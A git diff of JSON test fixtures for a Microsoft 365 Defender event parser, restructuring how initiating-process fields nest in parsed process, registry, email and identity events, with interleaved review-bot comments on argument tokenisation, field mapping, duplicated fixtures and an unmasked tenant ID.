\"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", 
\"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":18026
4,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "message": 
"{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "process" 
@@ -13,70 +19,119 @@ "info" ] }, - "@timestamp": "2024-10-22T15:09:44.594155Z", + "@timestamp": "2024-11-08T14:38:51.907372Z", "action": { "properties": { - "InitiatingProcessLogonId": "0", - "LogonId": "0" + "AccountSid": "S-1-2-3", + "LogonId": "999", + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Network Command Shell", + "VersionInfoInternalFileName": "processcommand.exe", + "VersionInfoOriginalFileName": "processcommand.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.1", + "parent": { + "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "FileSize": 145408, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "file", + "VersionInfoOriginalFileName": "file.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + } }, "type": "ProcessCreated" }, "file": { - "directory": "/usr/bin/ps", + "directory": "C:\\Windows\\processcommand.exe", "hash": { - "md5": "098f6bcd4621d373cade4e832627b4f6", - "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", - "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" }, - "name": "ps", - "size": 144632 + "name": "processcommand.exe", + "size": 82944 }, "host": { - "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", - "name": "computer.intranet.example" + "id": "123456789abcdef", + "name": "host.group.local" }, "microsoft": { "defender": { "report": { - 
"id": "67417" + "id": "17318" } } }, "process": { "args": [ - "--no-headers", - "-A", - "-o", - "comm,pid,pcpu,pmem,rss,etimes" + "HTTP", + "advfirewall", + "delete", + "embedded", + "firewall", + "incoming", + "name=\"program=description=", + "rule", + "server", + "traffic\"" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, - "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", + "name": "processcommand.exe", "parent": { - "pid": 0 + "args": [ + "-Embedding", + "ABCDEF0123456789", + "E", + "Global\\HOST0000" + ], + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "executable": "c:\\windows\\file.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "file.exe", + "pid": 10868, + "start": "2024-11-08T14:38:00.674494Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows" }, - "pid": 423627, - "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "pid": 4520, + "start": "2024-11-08T14:38:51.903048Z", + "working_directory": "C:\\Windows" }, "related": { "hash": [ - "098f6bcd4621d373cade4e832627b4f6", - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", - "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" ], "user": [ - "root" + "syst\u00e8me" ] }, "user": { - 
"domain": "computer", - "name": "root" + "domain": "account domain", + "name": "syst\u00e8me" } } } \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 3fe0d2cf8..212f23549 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json 
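Review bot: The new `process.args` in this hunk pins a quote-unaware split of the command line: the single quoted argument `name="program=description= embedded HTTP server incoming traffic"` becomes the separate tokens `name=\"program=description=`, `embedded`, `HTTP`, `server`, `incoming`, `traffic\"`, while the parent's `args` are split cleanly. If this reflects the parser rather than a deliberate choice, any rule matching on `process.args` for firewall-rule deletions will see fragments, so it is worth either fixing the tokenisation or recording it in the fixture with a comment in the test description. The same hunk also asserts `"directory": "C:\\Windows\\processcommand.exe"`, i.e. `file.directory` holds the full executable path taken from `FolderPath`, which was already the case before the change (`/usr/bin/ps`) and looks like a field-mapping mismatch rather than something this commit introduced. The expected object starts above the hunk, so I cannot see whether `file.path` or `process.executable` is set for the child process.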
@@ -16,17 +16,19 @@ "@timestamp": "2023-01-04T14:35:20.616193Z", "action": { "properties": { - "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", - "InitiatingProcessFileSize": 445440, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client", - "InitiatingProcessVersionInfoInternalFileName": "omadmclient", - "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193", - "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements" + "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements", + "process": { + "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", + "FileSize": 445440, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Host Process for OMA-DM Client", + "VersionInfoInternalFileName": "omadmclient", + "VersionInfoOriginalFileName": "omadmclient.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.19041.2193" + } }, "type": "RegistryKeyDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index a04e0e8be..72f93da4e 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:47.246794Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json index 294c92d60..5f3e9f9b1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json 
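Review bot: The second hunk in this file moves the initiating process to `process.parent` (`pid: 423638`, `start`) and leaves `process` with no `pid` of its own, while the registry-events fixture above and the email/identity fixtures below place the `InitiatingProcess*` properties directly under `action.properties.process`. For a ScriptContent event there is no created process, so the initiating process being the `parent` with an empty `process` looks inconsistent with those fixtures; if the input carries a `ProcessId` that is intentionally dropped, that is not visible from the hunk and should be stated in the test. The first hunk of this file follows the same `process.parent.LogonId` placement, so whichever convention is intended should be applied across all three event types in one go.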
@@ -17,16 +17,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
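Review bot: This fixture, and the identical hunks in `test_email_url_info.json` and `test_identity_directory.json`, assert an `action.type` of `NtAllocateVirtualMemoryApiCall` with the same software_reporter_tool process block and the same `2022-09-01T07:09:47.498056Z` timestamp, which does not look like an email or identity event. Since the inputs are outside the hunks I cannot confirm it, but three differently named fixtures converging on one device-event payload suggests they were copied and no longer exercise the email/identity mappings their filenames promise. If so, replacing their inputs with a real EmailEvents / EmailUrlInfo / IdentityDirectoryEvents sample would make the new `process` nesting actually tested for those tables.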
+++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 031a0b50a..57b4e7abc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json 
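Review bot: The `tenantId` kept in both the input and the expected message here (`ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac`) is a real-looking GUID, whereas the process-events fixture in this same commit masks it as `xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx`. The `InternetMessageId` was already shortened to `<1@eu-west-1.amazonses.com>`, so applying the same masking to the tenant id would keep the fixture free of identifying values and consistent with the rest of the change. The fix is the one value replaced in both the `input` and `expected` strings of this hunk.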
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
index 7d110bb54..e45140956 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
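Review bot: The `InitiatingProcess*` columns are nested under `action.properties.process` here, while the same columns (`CommandLine`, `FileSize`, `LogonId`) land under `action.properties.process.parent` in the test_process_error.json hunk `@@ -22,10 +22,14 @@`, and nothing in the fixtures records why one set of source columns has two homes. This reads as intentional — for an `NtAllocateVirtualMemoryApiCall` event the initiating process is the actor, whereas in the `ProcessCreated` fixture the created `grep` process is the actor and the python initiator becomes its parent — but that rule lives in the parser stage that does the renaming, which is outside this chunk, and deserves a one-line comment there, e.g. `# InitiatingProcess* is the acting process (process), except on ProcessCreated where Process* is the actor and InitiatingProcess* maps to process.parent`. The identical hunk is repeated in test_identity_directory.json, test_identity_info.json, test_identity_logon.json, test_identity_query.json and test_local_ip.json.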
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
+ "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "FileSize": 14687048,
+ "LogonId": "121834210",
+ "VersionInfoCompanyName": "Google",
+ "VersionInfoFileDescription": "Software Reporter Tool",
+ "VersionInfoInternalFileName": "software_reporter_tool_exe",
+ "VersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "VersionInfoProductName": "Software Reporter Tool",
+ "VersionInfoProductVersion": "102.286.200"
+ }
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index 0a0174b85..f1753e2d7 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -16,16 +16,18 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "InitiatingProcessFileSize": 14687048,
- "InitiatingProcessLogonId": "121834210",
- "InitiatingProcessVersionInfoCompanyName": "Google",
- "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
- "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
- "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
- "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
- "InitiatingProcessVersionInfoProductVersion": "102.286.200"
+ "process": {
